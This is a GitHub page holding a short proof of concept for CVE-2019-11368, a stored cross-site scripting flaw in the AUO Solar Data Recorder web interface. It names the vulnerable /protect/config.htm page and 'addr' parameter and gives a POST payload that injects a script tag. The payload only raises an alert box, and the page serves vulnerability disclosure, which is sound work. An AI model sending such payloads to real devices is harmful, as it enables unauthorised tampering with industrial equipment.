Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
cve_poc/CVE-2019-11368
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
18 lines (16 sloc)
779 Bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: AUO Solar Data Recorder - Stored XSS | |
| # Date: 2019-04-16 | |
| # Exploit Author: Luca.Chiou | |
| # Vendor Homepage: https://www.auo.com/zh-TW | |
| # Version: AUO Solar Data Recorder all versions prior to v1.3.0 | |
| # Tested on: It is a proprietary devices: https://solar.auo.com/en-global/Support_Download_Center/index | |
| # CVE-ID: CVE-2019-11368 | |
| # 1. Description: | |
| # In AUO Solar Data Recorder web page, | |
| # user can modify the system settings by access the /protect/config.htm. | |
| # Attackers can inject malicious XSS code in parameter "addr" of post data. | |
| # The value of addr will be stored in database, so that cause a stored XSS vulnerability. | |
| # 2. Proof of Concept: | |
| # Browse http://<Your Modem IP>/protect/config.htm | |
| # Send this post data: | |
| addr= "<script>alert(123)</script>&dhcp=1 |